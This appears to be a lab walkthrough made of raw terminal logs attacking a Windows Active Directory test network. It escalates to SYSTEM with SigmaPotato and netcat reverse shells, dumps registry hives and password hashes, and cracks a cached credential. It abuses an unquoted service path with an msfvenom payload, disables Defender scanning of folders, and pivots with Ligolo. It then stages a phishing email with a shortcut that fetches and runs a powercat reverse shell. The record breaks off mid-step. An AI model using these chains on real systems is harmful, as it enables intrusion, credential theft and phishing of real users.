--2024-10-23 22:25:12-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/689169533/c2dab604-b778-49ae-9142-ea2e38b12908?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T022513Z&X-Amz-Expires=300&X-Amz-Signature=6ee7952c67be58f0adee183ac704344fbb9c46bd11783f13d134fc2c67e3f866&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSigmaPotato.exe&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63488 (62K) [application/octet-stream]
Saving to: ‘SigmaPotato.exe’
SigmaPotato.exe 100%[====================================================================================================================================================================================================>]
0K --.-KB/s in 0.004s
2024-10-23 22:25:12 (14.4 MB/s) - ‘SigmaPotato.exe’ saved [63488/63488]
Elevated Reverse Shell:
C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32> wget http://10.10.14.10:8000/nc.exe -O C:\Users\Public\new-nc.exe; wget http://10.10.14.10:8000/SigmaPotato.exe -O C:\Users\Public\SigmaPotato.exe; C:\Users\Public\SigmaPotato.exe "cmd /c C:\Users\Public\new-nc.exe 10.10.14.10 4445 -e cmd.exe"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 268 | Token: 0x708 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 1068
[+] Current Command Length: 61 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 5212
16. Spawned a Reverse Shell on WEB02 as SYSTEM
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.40] 49914
Microsoft Windows [Version 10.0.26100.3037]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
whoami
nt authority\system
17. Started a Samba Share in Kali
┌──(kali㉿kali)-[~]
└─$ sudo rm -f /etc/samba/smb.conf
┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/samba/smb.conf
[samba]
path = /home/kali/samba
browsable = yes
writable = yes
guest ok = yes
read only = no
create mask = 0664
directory mask = 0775
┌──(kali㉿kali)-[~]
└─$ mkdir samba
┌──(kali㉿kali)-[~]
└─$ sudo smbpasswd -a kali
[sudo] password for kali:
New SMB password:
Retype new SMB password:
Added user kali.
┌──(kali㉿kali)-[~]
└─$ sudo systemctl start smbd
[sudo] password for kali:
18. Authenticated to the Samba Share from the WEB02 SYSTEM shell
C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements!
PS C:\Windows\System32> net use \\10.10.14.10\samba /user:kali kali
net use \\10.10.14.10\samba /user:kali kali
The command completed successfully.
19. Saved Windows Registry Hives (SAM, SYSTEM, SECURITY) to the Samba Share
PS C:\Windows\System32> reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
The operation completed successfully.
The operation completed successfully.
The operation completed successfully.20. Confirmed the WEB02 Registry Hives were Successfully Transferred to the Samba Share
┌──(kali㉿kali)-[~]
└─$ ls samba
sam.save security.save system.save21. Dumped WEB02 Hashes with impacket-secretsdump
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam ~/samba/sam.save -system ~/samba/system.save -security ~/samba/security.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa5d7d3b4e79ba4336ba75a06121544f8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:75ba7dbbc6abcbd00b6ee7fd08e923a5:::
Betty:1001:aad3b435b51404eeaad3b435b51404ee:fbb4a76ec8ed39439e66fac2e49e5e70:::
[*] Dumping cached domain logon information (domain/username:hash)
AD.LAB/iis_service:$DCC2$10240#iis_service#7e052580f2934707e2689854bc3f0371: (2025-02-07 07:41:34)
AD.LAB/Administrator:$DCC2$10240#Administrator#a01d80260b293cd51b7518b02a74adb3: (2025-02-07 05:49:58)
AD.LAB/Betty:$DCC2$10240#Betty#5fc7ac829477877edf8a44a2f205b383: (2025-02-07 07:55:46)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:3300220023003300460032002000680048002a006a006c004c006700680068004f0025002700480062002700640079006c00590066003300300058002e002d00280054003c005d003f00680061002b0022003e0026004000330077003c0026005f0058006f00410044007500600072004a00220035004c007400300078003800250048003b002600500063004c006c005a003f005e0062005a003c006e002f00460029004a0056006000460057004c0027006600490038003400380027006a006700620066006c0046004e00570020003c0056005f00290078005b002000580023003200260076006900200036004700
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9a2566114b94183102331d4b2b183008
[*] DPAPI_SYSTEM
dpapi_machinekey:0x0cd004d809036faabdf9f6a094900b99bbb4e3ae
dpapi_userkey:0xf109b4f8878c5676d1899dd730be657cbc45e582
[*] NL$KM
0000 4D 62 7F C0 49 8B 28 E3 0C 7E 01 85 DF B6 49 37 Mb..I.(..~....I7
0010 B6 14 2C 7B 2E 40 7E 55 E9 24 B7 44 85 44 40 13 ..,{.@~U.$.D.D@.
0020 29 C4 35 5A 26 63 5B FF A9 AE 0A 23 D8 6C CC A0 ).5Z&c[....#.l..
0030 90 B7 7B 44 9B 9B 1C B1 8B A6 7D 41 02 AE 18 90 ..{D......}A....
NL$KM:4d627fc0498b28e30c7e0185dfb64937b6142c7b2e407e55e924b7448544401329c4355a26635bffa9ae0a23d86ccca090b77b449b9b1cb18ba67d4102ae1890
[*] Cleaning up...22. Cracked Betty's Cached Domain Credential Hash with Hashcat, revealing the password "pinky.1995"
┌──(kali㉿kali)-[~]
└─$ hashcat -m 2100 -a 0 '$DCC2$10240#Betty#5fc7ac829477877edf8a44a2f205b383' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344390
* Bytes.....: 139921596
* Keyspace..: 14344390
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$DCC2$10240#betty#5fc7ac829477877edf8a44a2f205b383:pinky.1995
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 2100 (Domain Cached Credentials 2 (DCC2), MS Cache 2)
Hash.Target......: $DCC2$10240#betty#5fc7ac829477877edf8a44a2f205b383
Time.Started.....: Fri Feb 7 03:09:01 2025 (1 min, 14 secs)
Time.Estimated...: Fri Feb 7 03:10:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8157 H/s (6.15ms) @ Accel:256 Loops:512 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 601088/14344390 (4.19%)
Rejected.........: 0/601088 (0.00%)
Restore.Point....: 600064/14344390 (4.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9728-10239
Candidate.Engine.: Device Generator
Candidates.#1....: pliego -> pimp555
Hardware.Mon.#1..: Util: 94%
Started: Fri Feb 7 03:09:00 2025
Stopped: Fri Feb 7 03:10:16 20251. Successfully Authenticated to DMZ01 as Betty via WinRM
┌──(kali㉿kali)-[~]
└─$ nxc winrm 10.10.14.60 -u 'betty' -p 'pinky.1995'
WINRM 10.10.14.60 5985 DMZ01 [*] 10.0 Build 26100 (name:DMZ01) (domain:AD.LAB)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.14.60 5985 DMZ01 [+] AD.LAB\betty:pinky.1995 (Pwn3d!)2. Opened an Evil-WinRM Shell as Betty
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.14.60 -u 'betty' -p 'pinky.1995'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint3. Confirmed Privileges and Group Membership
*Evil-WinRM* PS C:\Users\betty\Documents> whoami /priv; whoami /groups
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
======================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-81924. Enumerated Unquoted Service Paths
*Evil-WinRM* PS C:\Users\betty\Documents> Get-ChildItem HKLM:\System\CurrentControlSet\Services | % { $p=(Get-ItemProperty $_.PSPath -ea SilentlyContinue).ImagePath; if($p -and $p -like "* *" -and $p -notmatch '^".*"$'){ "Unquoted path: $($_.PSChildName) => $p"}} | findstr BetaService
Unquoted path: BetaService => C:\MyApp\Beta Program\betaservice.exe5. Created a reverse shell
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f exe -o payload443.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload443.exe
6. Confirmed the Python3 HTTP Server is still Running
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
7. Navigated to the Parent Directory of the Vulnerable Service's Executable Path and Uploaded the Reverse Shell Binary as “Beta.exe”
*Evil-WinRM* PS C:\Users\betty\Documents> cd C:\MyApps\
8. Uploaded the Reverse Shell Executable to the Vulnerable Path
*Evil-WinRM* PS C:\MyApps> upload payload443.exe Beta.exe
Info: Uploading /home/kali/payload443.exe to C:\MyApps\Beta.exe
Data: 9556 bytes of 9556 bytes copied9. Spawned a Reverse Shell as SYSTEM
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.60] 49810
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
whoami
nt authority\system10. Enumerated Logged-On Domain Users
C:\Windows\System32> dir C:\Users\
dir C:\Users\
Volume in drive C has no label.
Volume Serial Number is D637-439E
Directory of C:\Users
02/14/2025 08:38 PM DIR .
02/14/2025 08:38 PM DIR Administrator
02/14/2025 08:37 PM DIR betty
02/14/2025 08:38 PM DIR chris
02/14/2025 01:25 PM DIR LocalUser
02/14/2025 01:23 PM DIR Public
0 File(s) 0 bytes
6 Dir(s) 42,891,587,584 bytes free
11. Read the PowerShell History for Chris and discovered a command sending an email to daniela@ad.lab
C:\Windows\System32> type C:\Users\Chris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\Chris\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
New-Item -Path "C:\MyApps\Beta Program" -ItemType Directory
Add-MpPreference -ExclusionPath "C:\MyApps"
cd "C:\MyApps\Beta Program\"
notepad betaservice.ps1
.\betaservice.ps1
powershell -ep bypass
.\betaservice.ps1
dir
shutdown /s /t 0
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\BetaService" -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\BetaService" -Name ImagePath -Value 'C:\MyApp\Beta Program\betaservice.exe'
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\BetaService" -Name ImagePath
reg query "HKLM\SYSTEM\CurrentControlSet\Services\BetaService" /v ImagePath
shutdown /s /t 0
sc.exe create BetaService binPath= "C:\MyApps\Beta Program\betaservice.exe" type= own start= auto
Get-CimInstance -ClassName Win32_Service | Where-Object Name -eq "BetaService"
Get-Service BetaService
schtasks /create /tn "RunBetaServiceEveryMinute" /sc minute /mo 1 /tr "powershell -NoProfile -ExecutionPolicy Bypass -Command Restart-Service BetaService" /ru "NT AUTHORITY\SYSTEM" /f
schtasks /create /tn "StartBetaServiceOnBoot" /sc onstart /tr "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Restart-Service BetaService" /ru "NT AUTHORITY\SYSTEM" /f
shutdown /s /t 0
Send-MailMessage -SmtpServer "MAIL01" -From "administrator@ad.lab" -To "daniela@ad.lab" -Subject "Test SMTP Relay" -Body "Hello from Windows Server SMTP!"
shutdown /s /t 012. Downloaded and Prepared Ligolo
┌──(kali㉿kali)-[~]
└─$ cd /opt; sudo mkdir -p Pivoting/Ligolo-NG/{Linux/{Proxy,Agent},Windows/{Proxy,Agent}}; cd Pivoting/Ligolo-NG
┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_linux_amd64.tar.gz -O Linux/Agent/agent.tar.gz; sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_agent_0.5.2_windows_amd64.zip -O Windows/Agent/agent.zip; sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_proxy_0.5.2_linux_amd64.tar.gz -O Linux/Proxy/proxy.tar.gz; sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.2/ligolo-ng_proxy_0.5.2_windows_amd64.zip -O Windows/Proxy/proxy.zip
--2025-02-20 17:42:34-- http://10.10.14.14:8000/ligolo-ng_agent_0.5.2_linux_amd64.tar.gz
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2018731 (1.9M) [application/gzip]
Saving to: ‘Linux/Agent/agent.tar.gz’
Linux/Agent/agent.tar.gz 100%[===================================================================================================================================================================================================>] 1.92M --.-KB/s in 0.004s
2025-02-20 17:42:34 (430 MB/s) - ‘Linux/Agent/agent.tar.gz’ saved [2018731/2018731]
--2025-02-20 17:42:34-- http://10.10.14.14:8000/ligolo-ng_agent_0.5.2_windows_amd64.zip
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2070457 (2.0M) [application/zip]
Saving to: ‘Windows/Agent/agent.zip’
Windows/Agent/agent.zip 100%[===================================================================================================================================================================================================>] 1.97M --.-KB/s in 0.006s
2025-02-20 17:42:34 (354 MB/s) - ‘Windows/Agent/agent.zip’ saved [2070457/2070457]
--2025-02-20 17:42:34-- http://10.10.14.14:8000/ligolo-ng_proxy_0.5.2_linux_amd64.tar.gz
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4801384 (4.6M) [application/gzip]
Saving to: ‘Linux/Proxy/proxy.tar.gz’
Linux/Proxy/proxy.tar.gz 100%[===================================================================================================================================================================================================>] 4.58M --.-KB/s in 0.01s
2025-02-20 17:42:34 (431 MB/s) - ‘Linux/Proxy/proxy.tar.gz’ saved [4801384/4801384]
--2025-02-20 17:42:34-- http://10.10.14.14:8000/ligolo-ng_proxy_0.5.2_windows_amd64.zip
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4821614 (4.6M) [application/zip]
Saving to: ‘Windows/Proxy/proxy.zip’
Windows/Proxy/proxy.zip 100%[============================================================
=======================================================================================================================================>] 4.60M --.-KB/s in 0.01s
2025-02-20 17:42:34 (358 MB/s) - ‘Windows/Proxy/proxy.zip’ saved [4821614/4821614]
┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ sudo find . -name '*.tar.gz' -execdir tar -xzvf "{}" \; -execdir find . ! -executable -delete \;
LICENSE
README.md
proxy
LICENSE
README.md
agent
┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ sudo find . -name '*.zip' -execdir unzip "{}" \; -execdir find . -type f ! -name "*.exe" -delete \;
Archive: ./proxy.zip
inflating: LICENSE
inflating: README.md
inflating: proxy.exe
Archive: ./agent.zip
inflating: LICENSE
inflating: README.md
inflating: agent.exe
┌──(kali㉿kali)-[/opt/Pivoting/Ligolo-NG]
└─$ mkdir ~/ligolo; cd ~/ligolo; cp /opt/Pivoting/Ligolo-NG/Linux/Proxy/proxy /opt/Pivoting/Ligolo-NG/Windows/Agent/agent.exe .
13. Started a Python3 HTTP Server to serve Ligolo Agent
┌──(kali㉿kali)-[~/ligolo]
└─$ python3 -m http.server 8001
Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...
14. Added an IP interface in Kali, for the Ligolo Server
┌──(kali㉿kali)-[~/ligolo]
└─$ sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up; sudo ip route add 10.10.14.0/24 dev ligolo
[sudo] password for kali:
RTNETLINK answers: File exists15. Started the Ligolo Server
┌──(kali㉿kali)-[~/ligolo]
└─$ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
__ _
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ / __ \/ / __ \______/ __ \/ __ /
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
16. Added a Windows Defender Exclusion to Allow for Download of Ligolo Agent
C:\Windows\system32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> Add-MpPreference -ExclusionPath "C:\Users\Public"
Add-MpPreference -ExclusionPath "C:\Users\Public"17. Downloaded Ligolo Agent to C:\Users\Public
PS C:\Windows\system32> wget http://10.10.14.10:8001/agent.exe -O C:\Users\Public\agent.exe
wget http://10.10.14.10:8001/agent.exe -O agent.exe18. Launched the Ligolo Agent
PS C:\Windows\system32> cd C:\Users\Public
PS C:\Users\Public> .\agent.exe -connect 10.10.14.10:11601 -ignore-cert
.\agent.exe -connect 10.10.14.10:11601 -ignore-cert
time="2025-02-07T23:52:51-08:00" level=warning msg="warning, certificate validation disabled"
time="2025-02-07T23:52:51-08:00" level=info msg="Connection established" addr="10.10.14.10:11601"19. Started the Ligolo Tunnel
ligolo-ng » INFO[0075] Agent joined. name="NT AUTHORITY\\SYSTEM@DMZ01" remote="10.10.14.60:55594"
ligolo-ng » session
? Specify a session : 1 - #1 - NT AUTHORITY\SYSTEM@DMZ01 - 10.10.14.60:55594
[Agent : NT AUTHORITY\SYSTEM@DMZ01] » start
[Agent : NT AUTHORITY\SYSTEM@DMZ01] » INFO[0081] Starting tunnel to NT AUTHORITY\SYSTEM@DMZ011. Created and activated a Python virtual environment
┌──(kali㉿kali)-[~]
└─$ cd ~
┌──(kali㉿kali)-[~]
└─$ python3 -m venv ~/wsgidav-venv
┌──(kali㉿kali)-[~]
└─$ source ~/wsgidav-venv/bin/activate2. Installed WsgiDAV, Cheroot and lxml
┌──(wsgidav-venv)─(kali㉿kali)-[~]
└─$ pip install wsgidav cheroot lxml
Collecting wsgidav
Downloading WsgiDAV-4.3.3-py3-none-any.whl.metadata (7.0 kB)
Collecting defusedxml (from wsgidav)
Downloading defusedxml-0.7.1-py2.py3-none-any.whl.metadata (32 kB)
Collecting Jinja2 (from wsgidav)
Downloading jinja2-3.1.5-py3-none-any.whl.metadata (2.6 kB)
Collecting json5 (from wsgidav)
Downloading json5-0.10.0-py3-none-any.whl.metadata (34 kB)
Collecting PyYAML (from wsgidav)
Downloading PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (2.1 kB)
Collecting MarkupSafe>=2.0 (from Jinja2->wsgidav)
Downloading MarkupSafe-3.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (4.0 kB)
Downloading WsgiDAV-4.3.3-py3-none-any.whl (164 kB)
Downloading defusedxml-0.7.1-py2.py3-none-any.whl (25 kB)
Downloading jinja2-3.1.5-py3-none-any.whl (134 kB)
Downloading json5-0.10.0-py3-none-any.whl (34 kB)
Downloading PyYAML-6.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (767 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 767.5/767.5 kB 5.0 MB/s eta 0:00:00
Downloading MarkupSafe-3.0.2-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (23 kB)
Installing collected packages: PyYAML, MarkupSafe, json5, defusedxml, Jinja2, wsgidav
Successfully installed Jinja2-3.1.5 MarkupSafe-3.0.2 PyYAML-6.0.2 defusedxml-0.7.1 json5-0.10.0 wsgidav-4.3.3
Collecting cheroot
Downloading cheroot-10.0.1-py3-none-any.whl.metadata (7.1 kB)
Collecting lxml
Downloading lxml-5.3.1-cp312-cp312-manylinux_2_28_x86_64.whl.metadata (3.7 kB)
Collecting more-itertools>=2.6 (from cheroot)
Downloading more_itertools-10.6.0-py3-none-any.whl.metadata (37 kB)
Collecting jaraco.functools (from cheroot)
Downloading jaraco.functools-4.1.0-py3-none-any.whl.metadata (2.9 kB)
Downloading cheroot-10.0.1-py3-none-any.whl (104 kB)
Downloading lxml-5.3.1-cp312-cp312-manylinux_2_28_x86_64.whl (5.0 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 5.0/5.0 MB 3.8 MB/s eta 0:00:00
Downloading more_itertools-10.6.0-py3-none-any.whl (63 kB)
Downloading jaraco.functools-4.1.0-py3-none-any.whl (10 kB)
Installing collected packages: more-itertools, lxml, jaraco.functools, cheroot
Successfully installed cheroot-10.0.1 jaraco.functools-4.1.0 lxml-5.3.1 more-itertools-10.6.0
3. Created the Webdav Root Directory
┌──(wsgidav-venv)─(kali㉿kali)-[~]
└─$ mkdir ~/webdav
4. Launched the WebDAV Server
┌──(wsgidav-venv)─(kali㉿kali)-[~]
└─$ wsgidav --host=0.0.0.0 --port=81 --auth=anonymous --root /home/kali/webdav
Running without configuration file.
02:53:06.480 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
02:53:06.481 - INFO : WsgiDAV/4.3.3 Python/3.12.8 Linux-6.11.2-amd64-x86_64-with-glibc2.40
02:53:06.481 - INFO : Lock manager: LockManager(LockStorageDict)
02:53:06.481 - INFO : Property manager: None
02:53:06.481 - INFO : Domain controller: SimpleDomainController()
02:53:06.481 - INFO : Registered DAV providers by route:
02:53:06.481 - INFO : - '/:dir_browser': FilesystemProvider for path '/home/kali/wsgidav-venv/lib/python3.12/site-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
02:53:06.481 - INFO : - '/': FilesystemProvider for path '/home/kali/webdav' (Read-Write) (anonymous)
02:53:06.481 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
02:53:06.481 - WARNING : Share '/' will allow anonymous write access.
02:53:06.481 - WARNING : Share '/:dir_browser' will allow anonymous write access.
02:53:06.511 - INFO : Running WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.8
02:53:06.511 - INFO : Serving on http://0.0.0.0:81 ...5. Created a Windows Library File in the Web Root Directory.
┌──(kali㉿kali)-[~]
└─$ cd /home/kali/webdav
┌──(kali㉿kali)-[~/webdav]
└─$ vim config.Library-ms
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation<true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://10.10.14.10:81</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
6. Transferred a PowerShell shortcut file with a reverse shell payload to the Web Root Directory.
┌──(kali㉿kali)-[~/webdav]
└─$ sudo systemctl start ssh
[sudo] password for kali:
PS C:\Users\user1> $sc=(New-Object -ComObject WScript.Shell).CreateShortcut('C:\Users\user1\powershell.lnk'); "$($sc.TargetPath) $($sc.Arguments)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10:8002/powercat.ps1'); powercat -c 10.10.14.10 -p 4446 -e powershell"
PS C:\Users\user1> scp powershell.lnk kali@192.168.44.130:/home/kali/webdav
The authenticity of host '192.168.44.130 (192.168.44.130)' can't be established.
ED25519 key fingerprint is SHA256:rM9T5UaJ4bi41GdjMrfHyMDBbPsl3AFkQatT6cW71iI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Warning: Permanently added '192.168.44.130' (ED25519) to the list of known hosts.
kali@192.168.44.130's password:
powershell.lnk 100% 2038 1.9MB/s 00:00
┌──(kali㉿kali)-[~/webdav]
└─$ ls ~/webdav/powershell.lnk
/home/kali/webdav/powershell.lnk
7. Prepared an Email Body File
┌──(kali㉿kali)-[~/webdav]
└─$ echo "test" > body.txt8. Staged the Powercat Script for Remote Execution
┌──(kali㉿kali)-[~/webdav]
└─$ find / -name powercat.ps1 -type f 2>/dev/null
/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1
┌──(kali㉿kali)-[~/webdav]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .9. Confirmed the Necessary Files Exist
┌──(kali㉿kali)-[~/webdav]
└─$ ls /home/kali/webdav
body.txt config.Library-ms powercat.ps1 powershell.lnk10. Started a Python3 HTTP Server to Serve powercat.ps1
┌──(kali㉿kali)-[~/webdav]
└─$ python3 -m http.server 8002
Serving HTTP on 0.0.0.0 port 8002 (http://0.0.0.0:8002/) ...
11. Verified Connectivity to the Mail Server
┌──(kali㉿kali)-[~/webdav]
└─$ telnet mail01.ad.lab 25
Trying 10.10.14.80...
Connected to mail01.ad.lab.
Escape character is '^]'.
220 MAIL01.AD.LAB Microsoft ESMTP MAIL Service, Version: 10.0.20348.1 ready at Fri, 7 Feb 2025 23:55:58 -0800i
quit
Connection closed by foreign host.
Note: Ensure receiver.py is started on DEV01 before proceeding to the next steps.
12. Staged and Sent an Email with the Reverse Shell Shortcut, via SWAKS
┌──(kali㉿kali)-[~/webdav]
